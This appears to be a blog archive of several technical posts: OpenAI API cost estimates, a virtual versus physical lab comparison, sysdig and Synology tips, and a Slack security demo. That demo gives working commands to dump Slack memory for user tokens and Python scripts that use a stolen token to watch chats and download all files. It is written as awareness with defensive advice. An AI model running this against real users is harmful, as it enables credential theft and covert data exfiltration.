Category Archives: Uncategorized

Grant preparation – Estimating pricing for OpenAI

Prompt tokens in and completion tokens out are the best estimators for determining a cap on the cost of interacting with the model.


Example

You are using OpenAI to conduct zero-shot sentiment analysis on a dataset containing customer interactions. Something like what was done here: https://doi.org/10.1016/j.mlwa.2023.100508


Prompt Tokens

Say each row in your dataset consists of text roughly 200 words long.

Words and tokens are not 1:1, but we can round up to 200 tokens, which also helps account for the rest of the prompt.

If you want a more accurate count, you can tokenize the data here: https://platform.openai.com/tokenizer
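If you just need a rough programmatic estimate without visiting the tokenizer page, a common rule of thumb (roughly four characters of English text per token; this is an approximation, not the model's real tokenizer) can be scripted:

```python
def estimate_tokens(text):
    """Rough token estimate: ~4 characters per token for English text.
    This is a heuristic only; use the real tokenizer for accurate counts."""
    return max(1, round(len(text) / 4))

sample = "The customer was thrilled with the quick response from support."
print(estimate_tokens(sample))
```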


Completion Tokens

You want the model to return a paragraph containing a sentiment result along with an explanation of reasoning and some of the keywords associated with the sentiment.

On average, this result could be 150 words (approx. 150 tokens).

Processing 200 tokens of input with GPT-4 8K costs ~$0.006.

Generating 150 tokens of output with GPT-4 8K costs ~$0.009.

These prices change as OpenAI updates their models and pricing. For the most up-to-date pricing, please see the following page: https://openai.com/api/pricing


Cap on Expenses

In this example, a cap of $500 would allow you to perform ~33,333 queries.

Round down to account for testing, prompt engineering, and other learning curves: say, 30,000 queries.

If your dataset has fewer than 30,000 rows, then a cap of $500 makes sense.
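The arithmetic above can be wrapped in a small helper to sanity-check a budget. This is a sketch using the GPT-4 8K rates quoted in this example ($0.03 per 1K input tokens, $0.06 per 1K output tokens), which will drift out of date as OpenAI changes pricing:

```python
# Estimate per-query cost and how many queries fit under a budget cap.
# Rates are the GPT-4 8K prices used in the example above (USD per 1K tokens);
# always check https://openai.com/api/pricing for current numbers.
INPUT_RATE = 0.03   # $ per 1K prompt tokens
OUTPUT_RATE = 0.06  # $ per 1K completion tokens

def cost_per_query(prompt_tokens, completion_tokens):
    return (prompt_tokens * INPUT_RATE + completion_tokens * OUTPUT_RATE) / 1000

def queries_under_cap(cap_usd, prompt_tokens, completion_tokens):
    return int(cap_usd / cost_per_query(prompt_tokens, completion_tokens))

print(cost_per_query(200, 150))          # ~0.015 per query
print(queries_under_cap(500, 200, 150))  # ~33333 queries
```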

Virtual versus physical educational computing environments: A nuanced analysis


In the ever-evolving landscape of IT resources in higher education, colleges are increasingly gravitating towards virtual environments and BYOPC as a means of delivering more valuable educational experiences. While these approaches effectively address two key characteristics of educational computing resources, they also introduce new challenges in two other crucial areas. The perfect computing environment remains elusive, as both virtual and physical setups possess unique advantages and drawbacks.

Consistency, the first characteristic we explore, is vital when catering to a diverse student body. Both virtual and physical labs offer the advantage of centralized management, enabling faculty to ensure uniform software and computing resources across platforms. However, virtual environments are somewhat vulnerable to consistency issues due to their reliance on network performance. Factors such as wireless disruptions, home network limitations, and the end user’s device performance can impede the seamless consistency that physical labs inherently possess.

Moving on to control, we encounter an interesting dichotomy. Physical lab spaces lend themselves well to tight control during testing and evaluations, providing an environment with stringent oversight. In contrast, virtual labs empower students with access to a consistent set of resources, granting a high level of control within the virtual realm. Yet, when it comes to managing and controlling BYOPC endpoints, virtual environments introduce a host of challenges that must be tackled.

Accessibility, the third characteristic under scrutiny, is an area where virtual labs shine. Students can tap into resources anytime, from anywhere, thanks to the inherent accessibility of virtual setups. Additionally, the ability to accommodate multiple users simultaneously resolves the issue of resource utilization that often plagues physical labs, where empty seats restrict access to computing resources.

Lastly, scalability enters the equation. Virtual labs provide the flexibility to scale resources and seat counts effortlessly, unencumbered by physical space limitations. On the other hand, physical labs present difficulties in allocating and managing space, making it arduous to expand capacity as needs evolve. Moreover, the cost and inefficiency associated with scaling out specialized computing resources, such as large data storage or GPU compute, within a physical space make virtual environments a more appealing choice.

By carefully examining these characteristics, educators and administrators can make informed decisions when devising support plans for curriculum demands. Let’s consider a few examples to illustrate this approach:

Suppose all undergraduates require access to a core set of software, necessitating accessibility, scalability, and consistency. In this case, a virtual environment emerges as the most suitable solution.

Alternatively, when a course demands a computing environment specifically tailored for testing and exams, control, consistency, and accessibility become paramount. Here, a physical environment would likely be the optimal choice.

These examples offer a glimpse into the practical application of the characteristic-based analysis. However, to fully navigate the complexities of educational computing environments, it is crucial to delve deeper into the specific project requirements. For instance, in the context of an expanding college curriculum featuring data and compute-intensive coursework, we can pose pertinent questions aligned with the identified characteristics:

Consistency/Accessibility:

  • Is this intended for in-class work or homework?
  • Which specific courses will make use of this computing environment?

Control:

  • Are students expected to utilize this environment for testing and evaluation purposes?

Scalability:

  • How many students will be utilizing this environment in the first year?
  • What are the precise computing requirements?
  • Can we anticipate an increase in demand over time?

By considering these aspects and leveraging the comprehensive understanding gleaned from examining the characteristic framework, educational institutions can make more informed decisions when navigating the intricate landscape of virtual and physical computing environments.

Four characteristics to compare virtual and physical computing

Comparing Virtual and Physical educational computing environments using four main characteristics.

As colleges look to deliver more valuable IT resources, there is a trend to transition to virtual environments and BYOPC. I have found that while this addresses two common characteristics of educational computing resources, it introduces new challenges in two other areas. Bottom line, there is no perfect computing environment. The virtual desktop holds great value but there seems to remain a need for at least some physical computing space.

Consistent
Consistency is important when delivering services to a broad set of students. Both virtual and physical labs allow software and computing resources to be managed centrally. Faculty can rely on all students having similar experiences across all computing platforms when it comes to resource allocation. However, the virtual environment can suffer in consistency as it relies on network performance. Wireless disruptions, home or apartment networks, and the performance of the end user’s device are just some factors of consistency.

Controlled
An environment can be consistent and still be uncontrolled. A physical lab space can be tightly controlled during testing and evaluations. In a virtual lab, students have access to a consistent set of software and computing resources. A virtual environment, on its own, can be highly controlled. But as a resource it introduces a variety of challenges when there is a need to manage and control a BYOPC endpoint.

Accessible
Virtual Labs are highly accessible and enable students to use resources at any time and from anywhere. They also allow for concurrency, solving a utilization problem. Physical labs being used for teaching often have empty seats, further restricting students from accessing computing resources.

Scalable
Virtual labs allow for scaling of resources as well as seat counts. Without being constrained by physical space requirements, you can grow your virtual environment essentially at will. Physical lab space is much harder to allocate and manage, and specialized computing resources such as large data storage or GPU compute can be cost-prohibitive and inefficient when scaled out in a physical space.

If we examine both options, we can make better decisions when planning support for curriculum demands:

Virtual – Moderately consistent, Moderately controlled, Highly accessible, Highly scalable

Physical – Highly consistent, Highly controlled, Fairly accessible, Barely scalable

We can use these characteristics to match project needs.

Example: All undergraduates need access to a core set of software (must be accessible, must be scalable, must be consistent). A virtual environment makes the most sense.

Example: A course needs a computing environment for testing and exams (must be controlled, must be consistent, must be accessible). A physical environment makes the most sense.
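To make the matching concrete, here is a toy sketch using the ratings listed above. The 0–3 numeric encoding (Barely=0, Fairly=1, Moderately=2, Highly=3) and the priority-order comparison are my own assumptions, not an established rubric:

```python
# Ratings from the comparison above, encoded 0-3
# (Barely=0, Fairly=1, Moderately=2, Highly=3) -- my own numeric mapping.
RATINGS = {
    "virtual":  {"consistent": 2, "controlled": 2, "accessible": 3, "scalable": 3},
    "physical": {"consistent": 3, "controlled": 3, "accessible": 1, "scalable": 0},
}

def best_environment(required):
    """Pick the environment scoring highest on the required characteristics,
    compared in priority order (the first listed requirement matters most)."""
    return max(RATINGS, key=lambda env: tuple(RATINGS[env][c] for c in required))

print(best_environment(["accessible", "scalable", "consistent"]))   # virtual
print(best_environment(["controlled", "consistent", "accessible"])) # physical
```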

A more realistic example is something like the following:

The college curriculum is introducing more data and compute intensive coursework.

Using the characteristics above we can start asking questions such as:

Consistent/Accessible

  • Is this in class work or homework?
  • What specific courses will be using this?

Controlled

  • Will students be expected to use this environment for testing and evaluation?

Scalable

  • How many students will be using this in the first year?
  • What are the actual computing requirements?
  • Will this increase over time?

Beware an Attack on Slack

Slack is continuing to grow in popularity and is being adopted by industries across the globe as a tool to collaborate and communicate. I wanted to raise awareness of Slack as an attack vector and demo one of the security issues for companies using this tool in their environment. Users do not always just run Slack at work; many use it at home or in less secure environments. Not all users are security conscious, and obtaining access to one user’s system could provide an attacker with silent visibility into your operations.

How Slack authentication works

Slack authentication is handled by tokens. Most often, these tokens are requested through the API page and are used by bots, scripts, and other applications. Slack even provides a full page on the security considerations surrounding tokens and suggestions for securing them: https://api.slack.com/docs/oauth-safety. However, when you sign into the Slack application you are also assigned a token. This becomes a security consideration because Slack runs in the context of the user and stores tokens in plaintext in memory. These user tokens remain persistent for the entire login session. Tokens ARE revoked when a user explicitly signs out of the application; however, closing the browser window does not revoke the token, and few users close their messaging application. Another issue is that when signing into Slack, “keep me signed in” is checked by default, which helps extend the life of tokens.

Slack has instituted 2FA to help protect your account, but that only protects your sign-in; once your token has been collected, it can be used without any additional authentication.

Why is this a security risk and how can it be exploited?

This is not a bug or a vulnerability. This is an attack vector that needs to be considered when using Slack for confidential communications.

The main issue with Slack using and storing authentication tokens in its memory is that a user-mode application can pull that data out and use it to impersonate the user.

We are going to look at the Slack binary application on Windows as an example.

We are going to take advantage of the PowerShell function Out-Minidump, developed by Matthew Graeber, to dump the memory of the Slack process. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

#Source the Minidump script
. .\Out-Minidump.ps1
#pass the slack process(es) to Minidump
Get-Process slack | Out-Minidump
#parse the memory dumps looking for the pattern "xoxs-" and return the first result
Select-String .\slack* -Pattern xoxs- -List

You will see that the prior commands return a user token with the xoxs- prefix.

This same technique can be used against Slack in the Chrome and Firefox browsers by changing the process name. Once a token has been collected it can be used to interact with Slack with all the same privileges as the user. User Tokens are not tied to devices, endpoints, or IP addresses. This means that a threat actor can monitor Slack communications from anywhere once the token has been obtained.
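The Select-String step above can also be mirrored in Python when analyzing a dump offline. A minimal sketch: the xoxs- prefix comes from the post, while the function name and the exact token character set in the regex are my own assumptions:

```python
import re

# Candidate Slack user tokens start with "xoxs-"; the exact token alphabet
# is an assumption here, so the pattern is kept loose.
TOKEN_RE = re.compile(rb"xoxs-[A-Za-z0-9-]+")

def find_tokens(dump_bytes):
    """Return unique candidate user tokens found in raw memory-dump bytes."""
    return sorted({m.group().decode() for m in TOKEN_RE.finditer(dump_bytes)})

# Demo on a fabricated buffer; in practice, read the .dmp file in binary mode.
sample = b"\x00garbage\x00xoxs-123456789000\x00more garbage\x00"
print(find_tokens(sample))  # ['xoxs-123456789000']
```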

How can a token be used?

As an example, you can use it with tools such as the Python Slack client: https://github.com/slackhq/python-slackclient

When your token has been compromised it can be used to monitor conversations or even pull all channel history.

import time
from slackclient import SlackClient

#This script will silently monitor user communications
token = "xoxs-123456789000"
sc = SlackClient(token)
if sc.rtm_connect():
    while True:
        print sc.rtm_read()
        time.sleep(1)
else:
    print "Connection Failed, invalid token?"

The simple Python script below will list all the files associated with a site, generate a public URL for each of them, and download them. A simple way for a malicious user to quietly siphon all your data.

import time
import json
import urllib
import requests

from slackclient import SlackClient

token = "xoxs-123456789000"
sc = SlackClient(token)
fileSave = urllib.URLopener()

post_data = {}
post_data['token'] = token

if sc.rtm_connect():
    fileList = json.loads(sc.server.api_call("files.list"))['files']
    for x in fileList:
        post_data['file'] = x['id']
        #had to build this call myself because of how slackrequest.py handles the word "file" in post_data
        fileInfo = (requests.post("https://slack.com/api/files.sharedPublicURL", data=post_data)).json()['file']
        pub_secret = fileInfo['permalink_public'][-10:]
        downloadURL = fileInfo['url_private_download'] + "?pub_secret=" + pub_secret
        fileSave.retrieve(downloadURL, fileInfo['name'])
else:
    print "Connection Failed, invalid token?"

Suggestions to improve security:

If you are worried your tokens might have been compromised, you can force new ones to be generated by signing out of all your devices. Go to your account settings page and at the bottom of the page click “Sign out all other sessions”

User education is necessary to ensure that your team communication and collaboration remain secure. Do you trust that every team member has secured their home computer? One team member with a compromised token can lead to exfiltration of your entire team’s communications and files.

  • Be conscious of what files and information you share on Slack.
  • Request that users log out when not using Slack.
  • Uncheck “Keep me signed in” by default.

Frequency Analysis of Binary Executables

A set of posts by Mark Baggett on the SANS ISC site discussed using frequency analysis to detect DNS names and Base64-encoded data. This got me thinking about what else could be learned by using frequency analysis. I settled on using Mark's Python code to see about identifying executable files.

Importing Mark's original code, I can write a simple script that lets me pass it a binary file.

#build the frequency table from a reference binary
fc = FreqCounter()
fc.ignorecase = True
fc.ignorechars = ""
fc.tally_str(open(freq_file).read())
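For intuition, the scoring idea can be sketched as follows. This is my own minimal re-implementation of the concept (adjacent-character-pair frequencies), not Mark's actual FreqCounter code:

```python
from collections import Counter

class SimpleFreq:
    """Toy character-pair frequency scorer, loosely modeled on the idea
    behind Mark Baggett's FreqCounter (not his implementation)."""

    def __init__(self):
        self.pairs = Counter()   # counts of adjacent byte pairs
        self.firsts = Counter()  # counts of each byte leading a pair

    def tally(self, data):
        for a, b in zip(data, data[1:]):
            self.pairs[(a, b)] += 1
            self.firsts[a] += 1

    def probability(self, data):
        """Average likelihood (0-100) of each pair, given the reference tallies."""
        pairs = list(zip(data, data[1:]))
        if not pairs:
            return 0.0
        score = sum(self.pairs[(a, b)] / self.firsts[a]
                    for a, b in pairs if self.firsts[a])
        return 100.0 * score / len(pairs)

sf = SimpleFreq()
sf.tally(b"abababab")           # reference data
print(sf.probability(b"abab"))  # high: pairs match the reference
print(sf.probability(b"zzzz"))  # 0.0: pairs never seen in the reference
```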

With a binary file serving to build my frequency table, I can loop through a directory of files and find scores for each one.
I first created a dictionary to hold my filename and score information; this way, I can evaluate the results.

score_data = {}

path = directory
files = glob.glob(path)
for file in files:
    if os.path.isfile(file):
        print file
        f = open(file, 'rb')
        score = fc.probability(f.read())
        f.close()
        print score
        score_data[file] = score

Now to fill a directory with random executables, Excel spreadsheets, PDFs, and images.
For this test I decided to throw both PE and Mach-O file formats into the directory to see what would happen.

For the frequency map I decided to use Explorer.exe. I assumed that this would help to build a pretty comprehensive map that would (hopefully) be representative of a binary executable.

For analysis of the results I am simply writing the data out to a csv to allow for graphing and sorting.

#write our results out to a csv
with open(out_file, 'wb') as f:
    w = csv.writer(f)
    w.writerows(score_data.items())

Alright, before we get to the results: I noticed that this processing was taking a long time. Reading each file sequentially is not efficient, so I did a little refactoring to take advantage of multiprocessing.

#Get list of files
files = [join(path, f) for f in listdir(path) if isfile(join(path, f))]

def compute_probability(filename):
    f = open(filename, 'rb')
    score = fc.probability(f.read())
    f.close()
    return filename, score

#multiprocess our frequency comparison
pool = mp.Pool(processes=4)
score_data = dict(pool.map(compute_probability, files))

Previous execution time: 382.1 Seconds
Multiprocessing execution time: 164.9 Seconds

Now that we made execution MUCH faster, we can start looking at the results.

[Screenshot: frequency-analysis scores for the test directory]

The image is a little hard to see, so I have embedded a snippet of the results below. Interestingly enough, the probability-based frequency analysis rated executables (PE and Mach-O), DLLs, and dylibs fairly high. One anomalous Excel spreadsheet starts to break the streak with a probability of 11.

[Screenshot: snippet of the ranked results]

After that, the results start to intermingle, with dylibs falling in probability. (Yes, I realize that when I grabbed a random assortment of libraries, I copied the linked files, thus creating duplicates.)

These results also show that images and PDFs were NOT likely to be an executable file. So just for fun, I decided to see if we could use frequency analysis to find images. I added some PNGs and BMPs to our directory and used a random PNG file as my frequency map.

I won’t bore you with the results, but nothing in the test came back with a probability higher than 3, and a PNG did not show up until the 51st result. Images are not necessarily structured data, so I was not surprised by these results.

Frequency analysis is fun to experiment with. Feel free to check out the full code on my GitHub, along with Mark's frequency code.

Multiple instances of sysdig

With the newest release of sysdig, 0.1.99, you now have the option to run multiple concurrent instances of sysdig.

As a beta user of sysdig cloud, this is fantastic news. I now have the option to manually capture traces on the local machines without having to stop the cloud monitoring agent.

To configure sysdig for multiple connections, create a new file:

sudo vim /etc/modprobe.d/sysdig_probe.conf

Add the following line:

options sysdig_probe max_consumers=5

Restart the sysdigcloud agent, which will unload and reload the sysdig module:

service dragent stop
service dragent start

You will now have the ability to run multiple instances of sysdig while monitoring with sysdigcloud.

Synology script – set quota for users in an AD group

Quick post: to support some of our VDI efforts, we have utilized a Synology NAS to provide home folders for users. It works fairly well, but the Synology utilities are not very granular when it comes to managing multiple users. One distinct issue we ran into was trying to manage different quotas for specific groups.
Below is a simple bash script that takes an Active Directory group as an argument.
When run, it sets a disk quota for all the users in that group.

Edit the DOMAIN portion and the current “10G” quota to meet your needs.

if [ -n "$1" ]
then
    #get the members of the AD group and loop over each username
    for users in $(wbinfo --group-info DOMAIN\\$1 | sed -n -e 's/^.*\://;s/,/\n/gp')
    do
        #only set a quota if the user does not already have one
        if [ "$(synoquota --get $users /dev/vg1000/lv | sed -n 's/\[//;s/\]//;s/^[ \t]*//;s/Quota = //p')" = "0.00 KB" ]
        then
            synoquota --set $users 1 10G
        fi
    done
else
    echo "USAGE: setquotas.sh groupname"
fi